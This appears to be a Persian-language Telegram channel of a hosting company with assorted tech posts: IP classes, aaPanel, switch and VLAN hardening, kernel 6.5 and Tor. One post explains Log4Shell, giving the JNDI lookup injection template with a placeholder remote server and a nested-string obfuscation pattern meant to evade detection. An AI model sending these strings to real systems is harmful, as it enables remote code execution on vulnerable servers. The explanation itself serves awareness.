One3erver.com – Telegram
One3erver.com
798 subscribers
340 photos
3 videos
1 file
551 links
بخش اطلاعیه و آفرهای وان سرور
ارائه دهنده سرور اختصاصی و مجازی ،هاست و دامین، طراحی سایت و اپلیکشن، خدمات ارزی، سئو
♨️رسالت ما، کمک به رشد و پیشرفت کسب و کار شماست.♨️
support: @One3erver_support_bot
Website: https://one3erver.com
TEL: 026-910-10-914
Download Telegram
امکان ردیابی تمام بدن به کمک سیگنال‌های WIFI
#هوش_مصنوعی که بهت می‌گه متن و زمینت باید چه رنگی باشه👌

🔻 با استفاده از این هوش مصنوعی به راحتی هرچه تمام تر میتونید متوجه بشید که چه رنگی برای فونتون مناسبه ؛ و با توجه به پس زمینتون کدوم رنگ‌ بیشتر بولد میشه.

1️⃣ فقط کافیه وارد این سایت بشید.

2️⃣ به پایین اسکرول کنید و گزینه Contrast checker

3️⃣ حالا تو پنل مربع بالا رنگ متن رو انتخاب می‌کنید و از مربع پایین هم رنگ پس‌زمینرو باید سلکت کنید.

4️⃣در نهایت خود سایت بر اساس تعداد ستاره و نمره ای که بهت میده میگه دوتا رنگی که انتخاب کردین چقدر خوانایی دارن باهم

💠 @one3erver
🔥3
جهنمی به نام Log4Shell !
در ۹ دسامبر، یک آسیب‌پذیری حیاتی RCE یا همان اجرای کد از راه دور در Log4J آپاچی، یک سیستم گزارش‌گیری و لاگ بسیار رایج که توسط توسعه‌دهندگان برنامه‌های وب و سرور مبتنی بر جاوا و سایر زبان‌های برنامه‌نویسی استفاده می‌شود، آشکار شد. این آسیب‌پذیری در طیف گسترده‌ای ( چند صد میلیون دستگاه) از سرویس‌ها و برنامه‌های کاربردی روی سرورها را تحت تأثیر قرار می‌دهد و این مورد، آن را به شدت خطرناک و حساس می‌کند – و آخرین به‌روزرسانی‌ها برای آن برنامه‌های کاربردی روی سرور ضروری است.
برای درک نحوه کارکرد این اکسپلویت به دو عکس زیر نگاه کنید:
(ادامه در پست بعد)
💠 @one3erver
💯2
شرح کارکرد اکسپلویت :
باگ در نسخه های قبلی Log4J ناشی از ویژگی به نام message lookup substitution است. وقتی فعال شود (که به طور پیش‌فرض قبل از رفع آسیب پذیری فعال بود)، Log4j رشته‌هایی را که به JNDI در منابعِ کانفیگِ پیام‌های گزارش و پارامترهای ارسال شده توسط برنامه‌ها ارجاع می‌دهند، شناسایی می‌کند.
از آنجایی که Log4J در URL های ارسال شده در این رشته ها sanitize را انجام نمیدهد، مهاجم می تواند با یک پیام حاوی رشته جایگزین با  URL مربوط به یک سرور مخرب درخواست های مخرب را برای برنامه هایی ایجاد کند که از Log4J استفاده میکنند.

💠 @one3erver
💯2
در مورد برنامه‌های کاربردی وب، رشته می‌تواند بخشی از هر بخش از یک ارتباط HTTP باشد که ثبت و به عنوان یک دستور جایگزین که به سرور مخرب ارجاع می‌دهد کانفیگ می‌شود :
${jndi:[protocol]://[remote server and code address]}
انواع مختلفی از روش های مبهم سازی برای جلوگیری از شناسایی اسکن یا اکسپلویت استفاده می شود، از جمله استفاده از رشته های تو در تو برای فراخوانی رابط مانند:
(${${::-j}${::-n}${::-d}${::-I})
هنگامی که به Log4J ارسال می شود، رشته جایگزین به عنوان یک خطا گرفته شده و URL پردازش می شود. سپس کد لاگر از URL موجود در کد درخواست را انجام داده و پاسخ serialize شده و به هکر برمیگردد- که می تواند منجر به اجرای کد ارسال شده از URL مخرب که مربوط به هکر است ، شود.
منابع :
https://news.sophos.com/en-us/2021/12/12/log4shell-hell-anatomy-of-an-exploit-outbreak/

💠 @one3erver
💯3
با عرض سلام و وقت بخیر خدمت عزیزان
دوستان عزیز از وب سایت جدید وان سرور رونمایی شد. لطفا نظرات و انتقادات خود را به ایدی تلگرام زیر ارسال بفرماید

support: @One3erver_support_bot
Website: https://one3erver.com

با تشکر
4🤩3
مقدماتی بر IP آدرس ها - بخش اول
درک IP  پرایوت / Private :

تفاوت آیپی های public یا private چیست ؟
آدرس های آی پی به دو دسته Private (خصوصی) Public (عمومی) تقسیم بندی می شوند . آدرس های Public همان آدرس هایی هستند که در نهایت در اینترنت شناسه یک کامپیوتر خاص می شوند و معرف و شناسنامه یک کامپیوتر یا دیوایس خاص در دنیای Public است . ولی آی پی آدرس های Private چه هستند ؟ قبل توضیح اینکه این آدرس ها چه هستند و چگونه در دنیای اینترنت قابل دسترسی می شوند , بهتر است بدانیم که آنها در یک رنج خاصی تعریف شده هستند و بقیه آدرس ها به غیر از این رنج آدرس های Public را تشکیل خواهند داد .

رنج اول :  10.0.0.0

رنج دوم : 172.16.0.0 تا 172.31.0.0

رنج سوم : 192.168.0.0

(ادامه در پست پایین) :
💠 @one3erver
5
به طور خلاصه به طور زیر میشود :
IP Address
----------
IPv4 --> 32Bit --> 0 or 1

XXX.XXX.XXX.XXX --> Octet = 8bit

A 1 - 126      |  Subnet Mask : 255.0.0.0     /8     |  10.0.0.0 /8
  
B 128 - 191    |  Subnet Mask : 255.255.0.0   /16    |  172.16.0.0  172.31.0.0

C 192 - 223    |  Subnet Mask : 255.255.255.0 /24    |  192.168.0.0

Private IP Address
Public  IP Address


NET ID    /     HOST ID

NET ID : Subnet Mask

💠 @one3erver
6
هشدار هشدار
اخیرا مشکلات امنیتی جدی ای در اسکریپت X Panel گزارش شده که از قرار زیر میباشد :
این اسکرپیت به دلیل باگ های امنیتی که در آن وجود دارد میشود به سرور شما حملات ddos انجام داد، و یا از سرور شما اقدام به ddos به سرور های دیگر نمود !
و طبیعتا امکان مسدودی سرور استفاده کننده از سمت دیتاسنتر وجود دارد.

💠 @one3erver
😱51
معرفی aapanel
محصول، شرکت، BaoTa می باشد.
پنل aapanel کنترل پنلی ساده و درعین حال قدرتمند است که می‌تواند وب سرور را به راحتی و از طریق رابط گرافیکی مبتنی بر وب (GUI) مدیریت کند. تا کاربران تنها برروی پروژه و کار خود تمرکز کنند و نیز راحت تر زمان خود را برای توسعه اهداف خود صرف کنند.
مهم‌ترین ویژگی‌های aapanel چیست ؟
همانطور که گفتیم aaPanel کنترل پنل مدیریت سروری است که از سیستم‌عامل لینوکس پشتیبانی می‌کند. این کنترل پنل به راحتی سرور را از طریق ترمینال وب مدیریت کرده و موجب بهینه‌سازی عملیات‌ها می‌شود. برخی از مهم‌ترین ویژگی‌های aaPanel عبارتند از:

💠ایجاد و مدیریت وب‌سایت‌ها، FTP  و دیتابیس‌ها
💠مدیریت فایل تصویری
مدیریت نرم‌افزار بصری
💠مدیریتvisual CPU
💠مدیریت حافظه
💠مدیریت نمودار نظارت بر جریان
💠مدیریت وظایف زمان‌بندی شده
💠ارائه خدمات باز‌ و بسته‌شدن SSH
💠تغییرات پورت SSH
💠انتشار پورت فایروال
💠مشاهده گزارش عملیات CPU، حافظه، IO دیسک
💠نظارت بر داده‌های IO شبکه

سایت رسمی:
www.aapanel.com

💠 @one3erver
5
🏃🏻‍♂️Faster Copy & Paste

💠مطمعناً زمانی بوده که نیاز داشتید چند متن رو در لیست کپی خود داشته باشید
که در روند جای گذاری مطالب سرعت بیشتری را تجربه کنید و در وقت خود
صرفه جویی قابل توجهی را کرده باشید اما مجبور به طی کردن مسیر تکراری بودین!

🔰شرکت مایکروسافت قابلیت ترکیبی قرار داده که با فشردن
کلید های windows + v
لیست مطلب کپی شده را نمایش میدهد که امکان پبن کردن موارد مهم را فراهم میکند!

💠 @one3erver
41
#Security
🌐 چگونه ساختار شبکه سخت‌افزاری خود را امن کنیم؟
#Step_1
📝استفاده از سوئيچ­‌هایی با ساختار سلسله مراتبی (Hierarchy)

در زمان طراحی شبکه، مناسب است جهت کنترل هر چه بیشتر بر روی تجهیزات موجود در شبکه، معماری سوییچ‌های شبکه به صورت لایه‌ای باشد و در هر لایه سوییچ خاص آن لایه در نظر گرفته شود. به عنوان مثال با توجه به ساختار كلي شبكه در بالاترین لایه از سوئيچ لايه 3 Layer)Core) استفاده گردد و در لايه 2 (Distribution Layer) از سوئيچ‌هایی که خاص لایه دو طراحی شده‌اند استفاده گردد (مثل Cisco 2960). طرز كار اين سوئيچ­‌ها در اين ساختار، جهت ايجاد امنيت و مديريت شبكه امكانات بيشتري در اختيار می‌گذارد.
💠 @one3erver
🔥31
🖌توییت یاشار شاهین زاده

دیروز توییت وحیدو دیدم که x-panel آسیب‌پذیری امنیتی داره، با امیر رفتیم روش و نتیجه‌ای که رسیدیم: «سریعا فقط پاکش کنین». باگ‌های خیلی خطرناکی داره مثلا: رو سرور میشه دستور با سطح دسترسی Root اجرا کرد، کل User Pass کاربرا افشا میشه که در ادامه توضیح میدم ⬇️
https://youtu.be/yeVeJgCPc0s

یاشو🔗

💠 @one3erver
👍2🤯21
#Security
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_2

📝 عدم به كارگيري VTP Domain

توصيه ميشود كه در صورت امکان، تنظيمات vlan ها را بر روي سوئيچ ها به صورت دستي انجام داده و از اين پروتكل استفاده نكرد. لذا مي بايست VTP روي سوئيچ ها غير فعال شود. در اين روش تمامی سوئیچ­ها عضو این Domain می­باشند. سوئيچ core در ModeServer و بقیه سوئیچ­ها در Client Mode کار می­کنند. ضمناً VTP Password نيز جهت جلوگيري از حملات از نوع سوئيچينگ بايد در نظر گرفته شود.
💠 @one3erver
2👾2
نمودار زمان پاسخگویی به تیکت ها در وان سرور 😎

پ.ن: دقت داشته باشید دقیقه ها لحاظ نشده !

💠 @one3erver
6🤩4👍2💯1
#Security
🌐 چگونه ساختار شبکه سخت افزاری خود را امن کنیم؟
#Step_3

📝 استفاده از(Vlan ( Virtual Local Area Network
به منظور كنترل دسترسي در يك شبكه به صورت مجازي از اين روش استفاده مي شود و مي توان قسمت هاي مختلف در شبكه سازمان را به منظور دسترسي داشتن به يكديگر در يك vlan قرار داد تا بتوانند با يكديگر تبادل اطلاعات داشته و از طرفي بخش هايي كه در اين vlan قرار ندارند، مجاز به دسترسي به آن نيستند.
🔰معمولا براي اعمل محدوديت هاي بيشتر بهتر است سرور ها در يك vlan مجزا و سوئيچ ها نيز در يك vlan مجزا قرار گيرند و با ACL ها دسترسي بين vlanها را برقرار نمود.
🔰در صورت امكان client هايي كه مي خواهند به اينترنت متصل شوند در يك vlan قرار گيرند.
💠 @one3erver
👍2
صفحه رسمی وان سرور در Threads برای دوستان در دسترس قرار گرفت❤️
باعث افتخار ماست که میزبان شما در این شبکه اجتماعی باشیم❤️
https://www.threads.net/@one3erver
3💯1💔1
‏با توجه به اعلام Linus Torvalds کرنل 6.5 بزودی منتشر می شود. کلی ویژگی جدید اضافه و بهبود های مختلفی انجام شده



برخی ویژگی ها

1-Parallel CPU boot support
2-Better NTFS3 support
3-UEFI unaccepted memory support
4-AMDGPU/Radeon/AMDKFD kernel drivers
5-Secure erase
6-USB4 v2 support
7-Better sensor monitoring
8-KVM Guest Snapshots

💠@one3erver
👍31
مبحث شبکه های پیازی یا Tor (تور)
ما در دوره ی دیتا های آزاد زندگی می کنیم ، جایی که هر کسی  که دسترسی به ارتباط اینترنتی دارد تمامی اطلاعاتش در جهان به مانند اثر انگشتش وجود دارد .
چگونه Tor پاسخ ، مرور ایمن را دارد؟
مسیر یابی پیازی دو جنبه مهم دارد. اول ، شبکه Tor از داوطلبانی تشکیل شده است که از رایانه های خود به عنوان گره یا Node استفاده می کنند. در طول مرور های عادی . اطلاعات بین اینترنت درون پکت ها عبور میکند. زمانی که یک کاربر Tor یک وبسایت را بازدید می کند. اگر پکت های آنها به طور مستقیم به سرور انتقال داده نمیشود  در عوض ،Tor مسیری را از طریق node های اختصاص داده شده تصادفی ایجاد می کند که بسته قبل از رسیدن به سرور آن را دنبال می کند.
جنبه مهم دیگر مسیریابی پیازی ، نحوه ساخت بسته ها است. به طور معمول ، بسته ها شامل آدرس فرستنده و مقصد هستند. در هنگام استفاده از Tor ، بسته ها در یک لایه ، مانند عروسک های تودرتو پیچیده می شوند.

ادامه در پست پایین :

💠 @one3erver
👍2🔥21